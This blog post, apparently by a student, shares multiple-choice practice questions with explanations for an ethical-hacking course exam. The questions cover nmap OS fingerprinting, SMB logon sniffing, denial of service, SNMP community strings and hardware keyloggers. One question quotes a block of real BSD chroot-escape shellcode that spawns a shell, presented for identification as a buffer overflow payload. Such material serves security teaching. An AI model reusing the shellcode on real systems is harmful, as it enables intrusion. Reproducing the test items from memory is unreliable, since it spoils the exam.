Foresec Computer Hacking Exam Questions

Facing final semester exams? Chased by project deadlines, supervision sessions, assignments, and all the other terrors of university life, and suddenly the lecturer announces that the final exam will use Foresec questions in English? This time I will share my experience from taking the computer hacking course.
The following is the outline of Foresec questions that was handed out at the last class meeting; the lecturer said, "Study it, who knows, it might come up."
1. What would you do next to fingerprint the OS?

While attempting to discover the remote operating system on the target computer, you receive the following results from an nmap scan:
Starting nmap V. 3.10ALPHA9 ( www.insecure.org/nmap/ )
Interesting ports on 172.121.12.222:
(The 1592 ports scanned but not shown below are in state: filtered)
Port       State       Service
21/tcp     open        ftp
25/tcp     open        smtp
53/tcp     closed      domain
80/tcp     open        http
443/tcp    open        http
Remote operating system guess: Too many signatures match to reliably guess the OS.
Nmap run completed -- 1 IP address (1 host up) scanned in 277.483 seconds
What would you do next to fingerprint the OS?
A. Perform a tcp traceroute to the system using port 53
B. Run an nmap scan with the -vv option
C. Perform a Firewalk with that system as the target IP
D. Connect to the active services and review the banner information
Explanation:
Most people don’t care about changing the banners presented by applications listening to open ports and therefore you should get fairly accurate information when grabbing banners from open ports with, for example, a telnet application.
2. What do you think is the most likely reason behind this?

A user on your Windows 2000 network has discovered that he can use L0phtcrack to sniff the SMB exchange which carries user logons. The user is plugged into a hub with 23 other systems. However, he is unable to capture any logons though he knows that other users are logging on. What do you think is the most likely reason behind this?

A. L0phtcrack only sniffs logons to web servers
B. Kerberos is preventing it
C. There is a NIDS present on that segment
D. Windows logons cannot be sniffed

Explanation:
In a Windows 2000 network using Kerberos, pre-authentication is normally used and the user's password never leaves the local machine, so it is never exposed to the network and cannot be sniffed.

3. How does a denial-of-service attack work?

How does a denial-of-service attack work?

A. A hacker uses every character, word, or letter he or she can think of to defeat authentication
B. A hacker prevents a legitimate user (or group of users) from accessing a service
C. A hacker tries to decipher a password by using a system, which subsequently crashes the network
D. A hacker attempts to imitate a legitimate user by confusing a computer or even another person

Explanation:
In computer security, a denial-of-service attack (DoS attack) is an attempt to make a computer resource unavailable to its intended users. Typically the targets are high-profile web servers, and the attack attempts to make the hosted web pages unavailable on the Internet. It is a computer crime that violates the Internet proper use policy as indicated by the Internet Architecture Board (IAB).

3. What can he infer from this file?

While investigating a claim of a user downloading illegal material, the investigator goes through the files on the suspect’s workstation. He comes across a file that is just called “file.txt” but when he opens it, he finds the following:
#define MAKE_STR_FROM_RET(x) ((x)&0xff),(((x)&0xff00)>>8),(((x)&0xff0000)>>16),(((x)&0xff000000)>>24)
char infin_loop[]= /* for testing purposes */
"\xEB\xFE";
char bsdcode[] = /* Lam3rZ chroot() code by venglin */
"\x31\xc0\x50\x50\x50\xb0\x7e\xcd\x80\x31\xdb\x31\xc0\x43"
"\x43\x53\x4b\x53\x53\xb0\x5a\xcd\x80\xeb\x77\x5e\x31\xc0"
"\x8d\x5e\x01\x88\x46\x04\x66\x68\xff\xff\x01\x53\x53\xb0"
"\x88\xcd\x80\x31\xc0\x8d\x5e\x01\x53\x53\xb0\x3d\xcd\x80"
"\x31\xc0\x31\xdb\x8d\x5e\x08\x89\x43\x02\x31\xc9\xfe\xc9"
"\x31\xc0\x8d\x5e\x08\x53\x53\xb0\x0c\xcd\x80\xfe\xc9\x75"
"\xf1\x31\xc0\x88\x46\x09\x8d\x5e\x08\x53\x53\xb0\x3d\xcd"
"\x80\xfe\x0e\xb0\x30\xfe\xc8\x88\x46\x04\x31\xc0\x88\x46"
"\x07\x89\x76\x08\x89\x46\x0c\x89\xf3\x8d\x4e\x08\x8d\x56"
"\x0c\x52\x51\x53\x53\xb0\x3b\xcd\x80\x31\xc0\x31\xdb\x53"
"\x53\xb0\x01\xcd\x80\xe8\x84\xff\xff\xff\xff\x01\xff\xff\x30"
"\x62\x69\x6e\x30\x73\x68\x31\x2e\x2e\x31\x31\x76\x65\x6e"
"\x67\x6c\x69\x6e";
static int magic[MAX_MAGIC],magic_d[MAX_MAGIC];
static char *magic_str=NULL;
int before_len=0;

What can he infer from this file?
A. A picture that has been renamed with a .txt extension
B. An encrypted file
C. A uuencoded file
D. A buffer overflow

Explanation:
This is a buffer overflow exploit with its “payload” in hexadecimal format.


4. Which of the following features makes this possible?

SNMP is a protocol used to query hosts, servers, and devices about performance or health status data. Hackers have used this protocol for a long time to gather a great amount of information about remote hosts. Which of the following features makes this possible?

A. It uses TCP as the underlying protocol
B. It uses a community string sent as clear text
C. It is susceptible to sniffing
D. It is used by ALL devices on the market

Explanation:
SNMP uses UDP, not TCP, and although many devices use SNMP, not ALL devices use it, and it can be disabled on most of the devices that do use it. However, SNMP is susceptible to sniffing, and the community string (which effectively acts as a password) is sent in clear text.

5. Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products?

Which of the following keyloggers cannot be detected by anti-virus or anti-spyware products?

A. Stealth keylogger
B. Hardware keylogger
C. Software keylogger
D. Covert keylogger

Explanation:
As the hardware keylogger never interacts with the operating system, it is undetectable by anti-virus or anti-spyware products.
